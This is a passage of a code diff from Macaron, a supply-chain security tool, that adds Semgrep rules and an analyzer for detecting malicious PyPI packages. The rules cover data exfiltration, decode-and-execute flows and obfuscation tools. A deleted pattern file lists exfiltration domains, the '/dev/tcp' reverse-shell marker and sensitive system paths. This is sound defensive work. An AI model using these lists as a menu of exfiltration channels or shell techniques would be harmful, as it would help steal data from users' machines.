+ + Raises + ------ + ConfigurationError + If any Semgrep rule file could not be safely loaded, or if their format was not in the expected Semgrep + format, or if there were any files in 'target_files' not found when searching in 'path'. + """ + # We keep a record of any file paths we couldn't find to provide a more useful error message, rather than raising + # an error on the first missing file we see. + missing_files: list[str] = [] + target_file_paths: list[str] = [] + rule_ids: set[str] = set() + + for target_file in target_files: + file_paths = glob.glob(os.path.join(path, "**", target_file), recursive=True) + if not file_paths: + missing_files.append(target_file) + target_file_paths.extend(file_paths) + + if missing_files: + error_msg = f"The following semgrep files were not found in {path}: {missing_files}" + logger.debug(error_msg) + raise ConfigurationError(error_msg) + + for file_path in target_file_paths: + try: + with open(file_path, encoding="utf-8") as file: + semgrep_ruleset: dict[str, list] = yaml.safe_load(file.read()) + except yaml.YAMLError as yaml_error: + error_msg = f"Unable to open semgrep rule file {file_path}: {yaml_error}." + logger.debug(error_msg) + raise ConfigurationError(error_msg) from yaml_error + + # should be a top-level key "rules", and then a list of rules (dictionaries) with "id" entries + try: + for semgrep_rule in semgrep_ruleset["rules"]: + rule_ids.add(semgrep_rule["id"]) + except (KeyError, TypeError) as format_error: + error_msg = f"Invalid semgrep rule format for {file_path}: {format_error}." + logger.debug(error_msg) + raise ConfigurationError(error_msg) from format_error + + return rule_ids + + def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: + """Analyze the source code of the package for malicious patterns. + + This is the first phase of the source code analyzer. 
+ + Parameters + ---------- + pypi_package_json: PyPIPackageJsonAsset + The PyPI package JSON asset object. + + Returns + ------- + tuple[HeuristicResult, dict[str, JsonType]] + Containing the analysis results and relevant patterns identified. + + Raises + ------ + HeuristicAnalyzerValueError + if there is no source code available. + """ + analysis_result: dict = {} + # since we have to run them anyway, return disabled rule findings for debug information + disabled_results: dict = {} + # Here, we disable 'nosemgrep' ignoring so that this is not an evasion method of our scan (i.e. malware includes + # 'nosemgrep' comments to prevent our scan detecting those code lines). Read more about the 'nosemgrep' feature + # here: https://semgrep.dev/docs/ignoring-files-folders-code + semgrep_commands: list[str] = ["semgrep", "scan", "--oss-only", "--disable-nosem"] + result: HeuristicResult = HeuristicResult.PASS + + source_code_path = pypi_package_json.package_sourcecode_path + if not source_code_path: + error_msg = "Unable to retrieve PyPI package source code path" + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) + + semgrep_commands.extend(["--config", self.default_rule_path]) + if self.custom_rule_path: + semgrep_commands.extend(["--config", self.custom_rule_path]) + semgrep_commands.append(source_code_path) + + with tempfile.NamedTemporaryFile(mode="w+", delete=True) as output_json_file: + semgrep_commands.append(f"--json-output={output_json_file.name}") + logger.debug("executing: %s.", semgrep_commands) + try: + process = subprocess.run(semgrep_commands, check=True, capture_output=True) # nosec + except (subprocess.CalledProcessError, subprocess.TimeoutExpired) as semgrep_error: + error_msg = ( + f"Unable to run semgrep on {source_code_path} with arguments {semgrep_commands}: {semgrep_error}" + ) + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) from semgrep_error + + if process.returncode != 0: + error_msg = f"Error running 
semgrep on {source_code_path} with arguments" f" {process.args}" + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) + + try: + semgrep_output = json.loads(output_json_file.read()) + except (json.JSONDecodeError, UnicodeDecodeError) as output_read_error: + error_msg = f"Unable to read Semgrep JSON output: {output_read_error}" + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) from output_read_error + + if not semgrep_output: + return result, {} + + semgrep_findings = json_extract(semgrep_output, ["results"], list) + if not semgrep_findings: + return result, {} + + for finding in semgrep_findings: + rule_id = json_extract(finding, ["check_id"], str) + file = json_extract(finding, ["path"], str) + if not rule_id or not file: + continue + + file = os.path.relpath(file, os.path.dirname(source_code_path)) + start = json_extract(finding, ["start", "line"], int) + end = json_extract(finding, ["end", "line"], int) + message = json_extract(finding, ["extra", "message"], str) + + # We manually filter out disabled rule IDs, as Semgrep's command line argument `--exclude-rule` appears to + # only work if `--experimental` is also supplied to enable experimental features, which we do not use. + # Semgrep provides a relative path separated by '.' to the rule ID, where the rule ID is always the + # final element in that path, so we use that to match our rule IDs. + # e.g. rule_id = src.macaron.resources.pypi_malware_rules.obfuscation_decode-and-execute, which comes from + # the rule ID 'obfuscation_decode-and-execute' inside 'obfuscation.yaml'. 
+ if rule_id.split(".")[-1] in self.disabled_rule_ids: + if rule_id not in disabled_results: + disabled_results[rule_id] = {"message": message, "detections": []} + disabled_results[rule_id]["detections"].append({"file": file, "start": start, "end": end}) + + else: + if rule_id not in analysis_result: + analysis_result[rule_id] = {"message": message, "detections": []} + analysis_result[rule_id]["detections"].append({"file": file, "start": start, "end": end}) + + # some semgrep rules were triggered, even after removing disabled ones + if analysis_result: + result = HeuristicResult.FAIL + + return result, { + "enabled_sourcecode_rule_findings": analysis_result, + "disabled_sourcecode_rule_findings": disabled_results, + } diff --git a/src/macaron/malware_analyzer/pypi_heuristics/suspicious_pattern.yaml b/src/macaron/malware_analyzer/pypi_heuristics/suspicious_pattern.yaml deleted file mode 100644 index 9c15144d4..000000000 --- a/src/macaron/malware_analyzer/pypi_heuristics/suspicious_pattern.yaml +++ /dev/null @@ -1,101 +0,0 @@ -# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved. -# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. - - -#This file defines the malicious pattern. -#The pattern is collected from the malware repository of Pypi.org. 
-imports: -- requests -- base64 -- Fernet -- telebot -- platform -- ClientSession -- socket -- os -- getpass -- telegram -- __pyarmor__ -- urllib.request.urlopen -- subprocess -- Request - -ast_calls: - os_detection: - - os.name - code_execution: - - exec - - subprocess.run - - subprocess.call - - subprocess.Popen - - subprocess.check_call - - os.system - info_collecting: - - os.getcwd - - os.getlogin - - os.getenv - - os.environ - - os.uname - - getpass.getuser - - socket.gethostname - - platform.node - - platform.system - - platform.version - - keyboard.on_release - obfuscation: - - base64.b64decode - - __pyarmor__ - # - Fernet.decrypt - remote_connection: - - requests.get - - requests.post - - telegram.send_document - - urllib.request.urlopen - - urllib.request.urlretrieve - - Request - - socket.socket - custom_setup: - - install - reverse_shell: - - os.dup2 - -ast_constant: - domains: - - webhook.site - - discord - - cdn.discordapp.com - - oast.fun - - api.telegram.org - - diddlydingusdu.de # builderknower2 - - pipedream.net # business-kpi-manager - - 2.tcp.ngrok.io - - files.pypihosted.org - - filebin.net - - akinasouls.fr - - api.ipify.org # Get public IP of the victim - - httpbin.or - - ngrok.ap - - oastify.com - - pythonanywhere.com - - deliverycontent.online - local_path: - - /storage/emulated/0 # Android: primary user account on the device - - /etc/resolv.conf # DNS - - /etc/hosts # DNS - - /sys/class/net # Network related - - /run/systemd/resolve/stub-resolv.conf - - /sdcard/DCIM # Photo storage - executable: - - .exe - windows: - - APPDATA - - Start-Process # Execute command - - powershell - reverse_shell: - - /dev/tcp - os_detection: - - nt # Windows - - Windows - - Darwin # MacOS - - Linux - - posix # Linux diff --git a/src/macaron/repo_finder/repo_finder_pypi.py b/src/macaron/repo_finder/repo_finder_pypi.py index 873bd2a20..b11f9cbe6 100644 --- a/src/macaron/repo_finder/repo_finder_pypi.py +++ b/src/macaron/repo_finder/repo_finder_pypi.py @@ -67,7 
+67,7 @@ def find_repo( break if not pypi_asset: - pypi_asset = PyPIPackageJsonAsset(purl.name, purl.version, False, pypi_registry, {}) + pypi_asset = PyPIPackageJsonAsset(purl.name, purl.version, False, pypi_registry, {}, "") if not pypi_asset.package_json and not pypi_asset.download(dest=""): return "", RepoFinderInfo.PYPI_HTTP_ERROR diff --git a/src/macaron/resources/pypi_malware_rules/exfiltration.yaml b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml new file mode 100644 index 000000000..fd96eeef0 --- /dev/null +++ b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml @@ -0,0 +1,271 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +rules: +- id: exfiltration_remote-exfiltration + metadata: + description: Detects the flow of sensitive information to a remote endpoint. + message: Detected exfiltration of sensitive data to a remote endpoint + languages: + - python + severity: ERROR + mode: taint + options: + # this will help us detect the flow of objects for exfiltration, like + # "with requests.Session() as s: s.get(...)" + symbolic_propagation: true + pattern-sources: + - pattern-either: + # result of code/command evaluation + - pattern: exec(...) + - pattern: eval(...) + - pattern: builtins.exec(...) + - pattern: builtins.eval(...) + - pattern: __import__('builtins').exec(...) + - pattern: __import__('builtins').eval(...) + + # process spawning + # using subprocess module + - pattern: subprocess.check_output(...) + - pattern: subprocess.check_call(...) + - pattern: subprocess.run(...) + - pattern: subprocess.call(...) + - pattern: subprocess.Popen(...) + - pattern: subprocess.getoutput(...) + - pattern: subprocess.getstatusoutput(...) + # using os module + - pattern: os.execl(...) + - pattern: os.execle(...) + - pattern: os.execlp(...) + - pattern: os.execlpe(...) + - pattern: os.execv(...) 
+ - pattern: os.execve(...) + - pattern: os.execvp(...) + - pattern: os.execvpe(...) + - pattern: os.popen(...) + - pattern: os.posix_spawn(...) + - pattern: os.posix_spawnp(...) + - pattern: os.spawnl(...) + - pattern: os.spawnle(...) + - pattern: os.spawnlp(...) + - pattern: os.spawnlpe(...) + - pattern: os.spawnv(...) + - pattern: os.spawnve(...) + - pattern: os.spawnvp(...) + - pattern: os.spawnvpe(...) + - pattern: os.system(...) + - pattern: os.popen(...) + # using commands module + - pattern: commands.getstatusoutput(...) + - pattern: commands.getoutput(...) + # using runpy module + - pattern: runpy.run_module(...) + - pattern: runpy.run_path(...) + + # environment variables + - pattern: os.environ + - pattern: os.environ[...] + - pattern: os.environ.get(...) + - pattern: os.environb + - pattern: os.environb[...] + - pattern: os.environb.get(...) + - pattern: os.getenv(...) + - pattern: os.getenvb(...) + + # system information + - pattern: os.uname(...) + - pattern: os.confstr(...) + - pattern: os.confstr_names + - pattern: os.sysconf(...) + - pattern: os.sysconf_names + - pattern: platform.release(...) + - pattern: platform.version(...) + - pattern: platform.uname(...) + - pattern: platform.win32_ver(...) + - pattern: platform.win32_edition(...) + - pattern: platform.win32_is_iot(...) + - pattern: platform.mac_ver(...) + - pattern: platform.ios_ver(...) + - pattern: platform.libc_ver(...) + - pattern: platform.freedesktop_os_release(...) + - pattern: platform.android_ver(...) + + # network information + - pattern: psutil.net_connections(...) + - pattern: psutil.net_if_addrs(...) + - pattern: psutil.net_if_stats(...) + - pattern: platform.node(...) + - pattern: platform.platform(...) + - pattern: socket.gethostname(...) + - pattern: socket.gethostbyname(...) + - pattern: socket.gethostbyname_ex(...) + - pattern: socket.getfqdn(...) + - pattern: socket.if_nameindex(...) + + # user information + - pattern: psutil.users(...) 
+ + # sensitive information + - pattern: getpass.getpass(...) + - pattern: getpass.unix_getpass(...) + - pattern: getpass.win_getpass(...) + - pattern: getpass.getuser(...) + - pattern: pwd.getpwuid(...) + - pattern: pwd.getpwnam(...) + - pattern: pwd.getpwall(...) + - pattern: keyring.get_keyring(...) + - pattern: keyring.get_password(...) + - pattern: keyring.get_credential(...) + + # file exfiltration + - pattern: os.read(...) + - patterns: + - pattern-either: + - pattern-inside: | + with open(...) as $FILE: + ... + - pattern-inside: | + with builtins.open(...) as $FILE: + ... + - pattern-inside: | + with __import__('builtins').open(...) as $FILE: + ... + - pattern-inside: | + $FILE = open(...) + ... + - pattern-inside: | + $FILE = builtins.open(...) + ... + - pattern-inside: | + $FILE = __import__('builtins').open(...) + ... + - pattern-either: + - pattern: $FILE.read(...) + - pattern: $FILE.readlines(...) + - pattern: yaml.safe_load(...) + - pattern: json.loads(...) + + pattern-sinks: + - pattern-either: + # remote connection + # using socket module + - patterns: + - pattern-either: + - patterns: + - pattern-either: + - pattern-inside: | + $SOC = socket.socket(...) + ... + - pattern-inside: | + with socket.socket(...) as $SOC: + ... + - pattern-either: + - pattern-inside: | + $SOC.connect(...) + ... + - pattern-inside: | + $SOC.connect_ex(...) + ... + - pattern-inside: | + $SOC.bind(...) + ... + # socket.socket and socket.connect in one call + - pattern-inside: | + $SOC = socket.create_connection(...) + ... + - pattern-inside: | + with socket.create_connection(...) as $SOC: + ... + # socket.socket and socket.bind in one call + - pattern-inside: | + $SOC = socket.create_server(...) + ... + - pattern-inside: | + with socket.create_server(...) as $SOC: + ... + - pattern-either: + # Assume that .accept, .listen was called somewhere if needed + - pattern: $SOC.send(...) + - pattern: $SOC.recv(...) + - pattern: $SOC.recvfrom(...) + - pattern: $SOC.recvmsg(...) 
+ - pattern: $SOC.recvmsg_into(...) + - pattern: $SOC.recvfrom_into(...) + - pattern: $SOC.recv_into(...) + - pattern: $SOC.sendall(...) + - pattern: $SOC.sendto(...) + - pattern: $SOC.sendmsg(...) + - pattern: $SOC.sendmsg_afalg(...) + - pattern: $SOC.sendfile(...) + # using requests module + - pattern: requests.get(...) + - pattern: requests.post(...) + - pattern: requests.put(...) + - pattern: requests.delete(...) + - pattern: requests.head(...) + - pattern: requests.options(...) + - pattern: requests.patch(...) + # object creation like requests.Session(...) here is omitted as exfiltrated data likely won't + # be passed into the parameters of those objects + - pattern: requests.Session(...).get(...) + - pattern: requests.Session(...).delete(...) + - pattern: requests.Session(...).head(...) + - pattern: requests.Session(...).options(...) + - pattern: requests.Session(...).patch(...) + - pattern: requests.Session(...).post(...) + - pattern: requests.Session(...).put(...) + - pattern: requests.Session(...).request(...) + - pattern: requests.Session(...).send(...) + - pattern: requests.Request(...) + # using urllib3 module + - pattern: urllib3.request(...) + - pattern: urllib3.PoolManager(...).request(...) + - pattern: urllib3.PoolManager(...).request_encode_body(...) + - pattern: urllib3.PoolManager(...).request_encode_url(...) + - pattern: urllib3.PoolManager(...).urlopen(...) + - pattern: urllib3.HTTPConnectionPool(...).urlopen(...) + - pattern: urllib3.HTTPConnectionPool(...).request(...) + - pattern: urllib3.HTTPConnectionPool(...).request_encode_body(...) + - pattern: urllib3.HTTPConnectionPool(...).request_encode_url(...) + - pattern: urllib3.HTTPSConnectionPool(...).urlopen(...) + - pattern: urllib3.HTTPSConnectionPool(...).request(...) + - pattern: urllib3.HTTPSConnectionPool(...).request_encode_body(...) + - pattern: urllib3.HTTPSConnectionPool(...).request_encode_url(...) + - pattern: urllib3.HTTPConnection(...).request(...) 
+ - pattern: urllib3.HTTPConnection(...).request_chunked(...) + - pattern: urllib3.HTTPSConnection(...).request(...) + - pattern: urllib3.HTTPSConnection(...).request_chunked(...) + - pattern: urllib3.ProxyManager(...).urlopen(...) + # using urllib + - pattern: urllib.request(...) + - pattern: urllib.request.urlopen(...) + # using httpx + - pattern: httpx.request(...) + - pattern: httpx.get(...) + - pattern: httpx.post(...) + - pattern: httpx.put(...) + - pattern: httpx.delete(...) + - pattern: httpx.head(...) + - pattern: httpx.options(...) + - pattern: httpx.stream(...) + - pattern: httpx.patch(...) + - pattern: httpx.AsyncClient(...).request(...) + - pattern: httpx.AsyncClient(...).get(...) + - pattern: httpx.AsyncClient(...).post(...) + - pattern: httpx.AsyncClient(...).put(...) + - pattern: httpx.AsyncClient(...).delete(...) + - pattern: httpx.AsyncClient(...).head(...) + - pattern: httpx.AsyncClient(...).options(...) + - pattern: httpx.AsyncClient(...).stream(...) + - pattern: httpx.AsyncClient(...).patch(...) + - pattern: httpx.AsyncClient(...).send(...) + - pattern: httpx.Client(...).request(...) + - pattern: httpx.Client(...).get(...) + - pattern: httpx.Client(...).post(...) + - pattern: httpx.Client(...).put(...) + - pattern: httpx.Client(...).delete(...) + - pattern: httpx.Client(...).head(...) + - pattern: httpx.Client(...).options(...) + - pattern: httpx.Client(...).stream(...) + - pattern: httpx.Client(...).patch(...) + - pattern: httpx.Client(...).send(...) diff --git a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml new file mode 100644 index 000000000..6d6ea066b --- /dev/null +++ b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml @@ -0,0 +1,313 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. 
+ +rules: +- id: obfuscation_inline-imports + metadata: + description: Detects use of inline imports with suspicious APIs, or obfuscated API imports. + message: Found an instance of a suspicious API in a hardcoded inline import + languages: + - python + severity: ERROR + pattern-either: + - pattern: __import__('base64') + - pattern: __import__('builtins') + - pattern: __import__('subprocess') + - pattern: __import__('sys') + - pattern: __import__('os') + - pattern: __import__('zlib') + - pattern: __import__('marshal') + # python will evaluate a hex/oct string + - patterns: + - pattern: __import__('$HEX') + - metavariable-regex: + metavariable: $HEX + regex: (\\x\d{2})+ + - patterns: + - pattern: __import__('$OCT') + - metavariable-regex: + metavariable: $OCT + regex: (\\\d{3})+ + +- id: obfuscation_obfuscation-tools + metadata: + description: Detects the use of common python obfuscation packages. + message: Found an indicator of the use of a python code obfuscation tool + languages: + - python + severity: ERROR + pattern-either: + # pyarmor: pyarmor.readthedocs.io/en/latest/index.html + - pattern: import __pyarmor__ + - pattern: from $MODULE import __pyarmor__ + - pattern: from $MODULE import pyarmor_runtime + - pattern: __import__('__pyarmor__') + # pyarmor RTF mode: pyarmor.readthedocs.io/en/latest/tutorial/advanced.html + - pattern: __assert_armored__($PAYLOAD) + # inline pyarmor marker: pyarmor.readthedocs.io/en/latest/tutorial/advanced.html + - pattern-regex: ^\s*#\s*pyarmor:.* + # obfuscated names using pyob.oxyry.com with O, o, 0 or github.com/QQuick/Opy and pyobfuscate using l, I, 1 + - patterns: + - pattern-either: + - pattern: | + def $OBF(...): + ... + - pattern: | + class $OBF(...): + ... + - pattern: $OBF = ... + - metavariable-regex: + metavariable: $OBF + regex: (^_*([lI1_]{5,}|[Oo0_]{5,})_*$)|(^pyarmor_*\d+$) + # obfuscated using pyobfuscate.com + - pattern: pyobfuscate=... 
+ # obfuscated using liftoff.github.io/pyminifier + - pattern: import mystificate + - pattern: import demiurgic + +- id: obfuscation_decode-and-execute + metadata: + description: Detects the flow of a decoded or constructed string to process execution, code evaluation, network connections, or file writes. + message: Detected the flow of a decoded primitive value to a remote endpoint, process, code evaluation, or file write + languages: + - python + severity: ERROR + mode: taint + options: + # This will help detect partial things over multiple lines like: "x = builtins.bytes; x.decode(...)" + symbolic_propagation: true + pattern-sources: + - pattern-either: + # marshal encryption + - pattern: marshal.loads(...) + - pattern: __import__('marshal').loads(...) + # bytes decoding + - pattern: | + b'...'.decode(...) + - pattern: bytes.decode(...) + - pattern: builtins.bytes.decode(...) + - pattern: __import__('builtins').bytes.decode(...) + # decompression + - pattern: zlib.decompress(...) + - pattern: __import__('zlib').decompress(...) + # base64 decoded string values + - pattern: base64.b64decode(...) + - pattern: __import__('base64').b64decode(...) + - pattern: b64decode(...) + # hex encoded values + - pattern: bytes.fromhex(...) + - pattern: builtins.bytes.fromhex(...) + - pattern: __import__('builtins').bytes.fromhex(...) + # unicode construction + - patterns: + - pattern-either: + - pattern: $STRING.join(map($FOO, [...])) + - pattern: $STRING.join($FOO($VAL) for $VAL in [...]) + - pattern: $STRING.join($FOO($VAL) for $VAL in $ITER) + - pattern: $STRING.join($FOO($VAL) for $VAL in $GEN(...)) + - metavariable-regex: + metavariable: $FOO + regex: unicode|unichr|chr|ord + + pattern-sinks: + - pattern-either: + # remote connection + # using socket module + - patterns: + - pattern-either: + - patterns: + - pattern-either: + - pattern-inside: | + $SOC = socket.socket(...) + ... + - pattern-inside: | + with socket.socket(...) as $SOC: + ... 
+ - pattern-either: + - pattern-inside: | + $SOC.connect(...) + ... + - pattern-inside: | + $SOC.connect_ex(...) + ... + - pattern-inside: | + $SOC.bind(...) + ... + # socket.socket and socket.connect in one call + - pattern-inside: | + $SOC = socket.create_connection(...) + ... + - pattern-inside: | + with socket.create_connection(...) as $SOC: + ... + # socket.socket and socket.bind in one call + - pattern-inside: | + $SOC = socket.create_server(...) + ... + - pattern-inside: | + with socket.create_server(...) as $SOC: + ... + - pattern-either: + # Assume that .accept, .listen was called somewhere if needed + - pattern: $SOC.send(...) + - pattern: $SOC.recv(...) + - pattern: $SOC.recvfrom(...) + - pattern: $SOC.recvmsg(...) + - pattern: $SOC.recvmsg_into(...) + - pattern: $SOC.recvfrom_into(...) + - pattern: $SOC.recv_into(...) + - pattern: $SOC.sendall(...) + - pattern: $SOC.sendto(...) + - pattern: $SOC.sendmsg(...) + - pattern: $SOC.sendmsg_afalg(...) + - pattern: $SOC.sendfile(...) + # using requests module + - pattern: requests.get(...) + - pattern: requests.post(...) + - pattern: requests.put(...) + - pattern: requests.delete(...) + - pattern: requests.head(...) + - pattern: requests.options(...) + - pattern: requests.patch(...) + - pattern: requests.Session(...).get(...) + - pattern: requests.Session(...).delete(...) + - pattern: requests.Session(...).head(...) + - pattern: requests.Session(...).options(...) + - pattern: requests.Session(...).patch(...) + - pattern: requests.Session(...).post(...) + - pattern: requests.Session(...).put(...) + - pattern: requests.Session(...).request(...) + - pattern: requests.Session(...).send(...) + - pattern: requests.Request(...) + # using urllib3 module + - pattern: urllib3.request(...) + # object creation here is included as decoded values may be passed as parameters + - pattern: urllib3.PoolManager(...) + - pattern: urllib3.PoolManager(...).request(...) + - pattern: urllib3.PoolManager(...).request_encode_body(...) 
+ - pattern: urllib3.PoolManager(...).request_encode_url(...) + - pattern: urllib3.PoolManager(...).urlopen(...) + - pattern: urllib3.HTTPConnectionPool(...) + - pattern: urllib3.HTTPConnectionPool(...).urlopen(...) + - pattern: urllib3.HTTPConnectionPool(...).request(...) + - pattern: urllib3.HTTPConnectionPool(...).request_encode_body(...) + - pattern: urllib3.HTTPConnectionPool(...).request_encode_url(...) + - pattern: urllib3.HTTPSConnectionPool(...) + - pattern: urllib3.HTTPSConnectionPool(...).urlopen(...) + - pattern: urllib3.HTTPSConnectionPool(...).request(...) + - pattern: urllib3.HTTPSConnectionPool(...).request_encode_body(...) + - pattern: urllib3.HTTPSConnectionPool(...).request_encode_url(...) + - pattern: urllib3.HTTPConnection(...) + - pattern: urllib3.HTTPConnection(...).request(...) + - pattern: urllib3.HTTPConnection(...).request_chunked(...) + - pattern: urllib3.HTTPSConnection(...) + - pattern: urllib3.HTTPSConnection(...).request(...) + - pattern: urllib3.HTTPSConnection(...).request_chunked(...) + - pattern: urllib3.ProxyManager(...).urlopen(...) + # using urllib + - pattern: urllib.request(...) + - pattern: urllib.request.urlopen(...) + # using httpx + - pattern: httpx.request(...) + - pattern: httpx.get(...) + - pattern: httpx.post(...) + - pattern: httpx.put(...) + - pattern: httpx.delete(...) + - pattern: httpx.head(...) + - pattern: httpx.options(...) + - pattern: httpx.stream(...) + - pattern: httpx.patch(...) + - pattern: httpx.AsyncClient(...) + - pattern: httpx.AsyncClient(...).request(...) + - pattern: httpx.AsyncClient(...).get(...) + - pattern: httpx.AsyncClient(...).post(...) + - pattern: httpx.AsyncClient(...).put(...) + - pattern: httpx.AsyncClient(...).delete(...) + - pattern: httpx.AsyncClient(...).head(...) + - pattern: httpx.AsyncClient(...).options(...) + - pattern: httpx.AsyncClient(...).stream(...) + - pattern: httpx.AsyncClient(...).patch(...) + - pattern: httpx.AsyncClient(...).send(...) + - pattern: httpx.Client(...) 
+ - pattern: httpx.Client(...).request(...) + - pattern: httpx.Client(...).get(...) + - pattern: httpx.Client(...).post(...) + - pattern: httpx.Client(...).put(...) + - pattern: httpx.Client(...).delete(...) + - pattern: httpx.Client(...).head(...) + - pattern: httpx.Client(...).options(...) + - pattern: httpx.Client(...).stream(...) + - pattern: httpx.Client(...).patch(...) + - pattern: httpx.Client(...).send(...) + + # process spawning + # using subprocess module + - pattern: subprocess.check_output(...) + - pattern: subprocess.check_call(...) + - pattern: subprocess.run(...) + - pattern: subprocess.call(...) + - pattern: subprocess.Popen(...) + - pattern: subprocess.getoutput(...) + - pattern: subprocess.getstatusoutput(...) + # using os module + - pattern: os.execl(...) + - pattern: os.execle(...) + - pattern: os.execlp(...) + - pattern: os.execlpe(...) + - pattern: os.execv(...) + - pattern: os.execve(...) + - pattern: os.execvp(...) + - pattern: os.execvpe(...) + - pattern: os.popen(...) + - pattern: os.posix_spawn(...) + - pattern: os.posix_spawnp(...) + - pattern: os.spawnl(...) + - pattern: os.spawnle(...) + - pattern: os.spawnlp(...) + - pattern: os.spawnlpe(...) + - pattern: os.spawnv(...) + - pattern: os.spawnve(...) + - pattern: os.spawnvp(...) + - pattern: os.spawnvpe(...) + - pattern: os.system(...) + # using commands module + - pattern: commands.getstatusoutput(...) + - pattern: commands.getoutput(...) + # using runpy module + - pattern: runpy.run_module(...) + - pattern: runpy.run_path(...) + + # code evaluation/execution + - pattern: exec(...) + - pattern: eval(...) + - pattern: builtins.exec(...) + - pattern: builtins.eval(...) + - pattern: __import__('builtins').exec(...) + - pattern: __import__('builtins').eval(...) + + # file write + - patterns: + - pattern-either: + - pattern-inside: | + with open(...) as $FILE: + ... + - pattern-inside: | + with builtins.open(...) as $FILE: + ... + - pattern-inside: | + with __import__('builtins').open(...) 
as $FILE: + ... + - pattern-inside: | + $FILE = open(...) + ... + - pattern-inside: | + $FILE = builtins.open(...) + ... + - pattern-inside: | + $FILE = __import__('builtins').open(...) + ... + - pattern: $FILE.write(...) + - pattern: os.write(...) + - pattern: os.writev(...) + - pattern: os.pwrite(...) + - pattern: os.pwritev(...) diff --git a/src/macaron/slsa_analyzer/analyze_context.py b/src/macaron/slsa_analyzer/analyze_context.py index 84d8151f2..56199e085 100644 --- a/src/macaron/slsa_analyzer/analyze_context.py +++ b/src/macaron/slsa_analyzer/analyze_context.py @@ -51,8 +51,10 @@ class ChecksOutputs(TypedDict): """The provenance and related information.""" local_artifact_paths: list[str] """The local artifact absolute paths.""" - validate_malware: bool - """True when the malware validation is enabled.""" + analyze_source: bool + """True when PyPI source code analysis has been enabled.""" + force_analyze_source: bool + """When True, enforces running source code analysis, regardless of other heuristic results.""" class AnalyzeContext: @@ -106,7 +108,8 @@ def __init__( expectation=None, provenance_info=None, local_artifact_paths=[], - validate_malware=False, + analyze_source=False, + force_analyze_source=False, ) @property diff --git a/src/macaron/slsa_analyzer/analyzer.py b/src/macaron/slsa_analyzer/analyzer.py index d75b0d94e..8fd2e5f83 100644 --- a/src/macaron/slsa_analyzer/analyzer.py +++ b/src/macaron/slsa_analyzer/analyzer.py @@ -136,8 +136,9 @@ def run( sbom_path: str = "", deps_depth: int = 0, provenance_payload: InTotoPayload | None = None, - validate_malware: bool = False, verify_provenance: bool = False, + analyze_source: bool = False, + force_analyze_source: bool = False, ) -> int: """Run the analysis and write results to the output path. @@ -154,10 +155,12 @@ def run( The depth of dependency resolution. Default: 0. provenance_payload : InToToPayload | None The provenance intoto payload for the main software component. 
- validate_malware: bool - Enable malware validation if True. verify_provenance: bool Enable provenance verification if True. + analyze_source : bool + When true, triggers source code analysis for PyPI packages. Defaults to False. + force_analyze_source : bool + When true, enforces running source code analysis regardless of other heuristic results. Defaults to False. Returns ------- @@ -190,8 +193,9 @@ def run( main_config, analysis, provenance_payload=provenance_payload, - validate_malware=validate_malware, verify_provenance=verify_provenance, + analyze_source=analyze_source, + force_analyze_source=force_analyze_source, ) if main_record.status != SCMStatus.AVAILABLE or not main_record.context: @@ -309,8 +313,9 @@ def run_single( analysis: Analysis, existing_records: dict[str, Record] | None = None, provenance_payload: InTotoPayload | None = None, - validate_malware: bool = False, verify_provenance: bool = False, + analyze_source: bool = False, + force_analyze_source: bool = False, ) -> Record: """Run the checks for a single repository target. @@ -327,10 +332,12 @@ def run_single( The mapping of existing records that the analysis has run successfully. provenance_payload : InToToPayload | None The provenance intoto payload for the analyzed software component. - validate_malware: bool - Enable malware validation if True. verify_provenance: bool Enable provenance verification if True. + analyze_source : bool + When true, triggers source code analysis for PyPI packages. Defaults to False. + force_analyze_source : bool + When true, enforces running source code analysis regardless of other heuristic results. Defaults to False. Returns ------- @@ -546,7 +553,8 @@ def run_single( # TODO Add release digest. 
) - analyze_ctx.dynamic_data["validate_malware"] = validate_malware + analyze_ctx.dynamic_data["analyze_source"] = analyze_source + analyze_ctx.dynamic_data["force_analyze_source"] = force_analyze_source if parsed_purl and parsed_purl.type in self.local_artifact_repo_mapper: local_artifact_repo_path = self.local_artifact_repo_mapper[parsed_purl.type] diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index e0e179e7f..a7d32fc18 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -13,7 +13,7 @@ from macaron.database.db_custom_types import DBJsonDict from macaron.database.table_definitions import CheckFacts -from macaron.errors import HeuristicAnalyzerValueError +from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError, SourceCodeError from macaron.json_tools import JsonType, json_extract from macaron.malware_analyzer.pypi_heuristics.base_analyzer import BaseHeuristicAnalyzer from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics @@ -26,7 +26,7 @@ from macaron.malware_analyzer.pypi_heuristics.metadata.typosquatting_presence import TyposquattingPresenceAnalyzer from macaron.malware_analyzer.pypi_heuristics.metadata.unchanged_release import UnchangedReleaseAnalyzer from macaron.malware_analyzer.pypi_heuristics.metadata.wheel_absence import WheelAbsenceAnalyzer -from macaron.malware_analyzer.pypi_heuristics.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer +from macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer from macaron.malware_analyzer.pypi_heuristics.sourcecode.suspicious_setup import SuspiciousSetupAnalyzer from 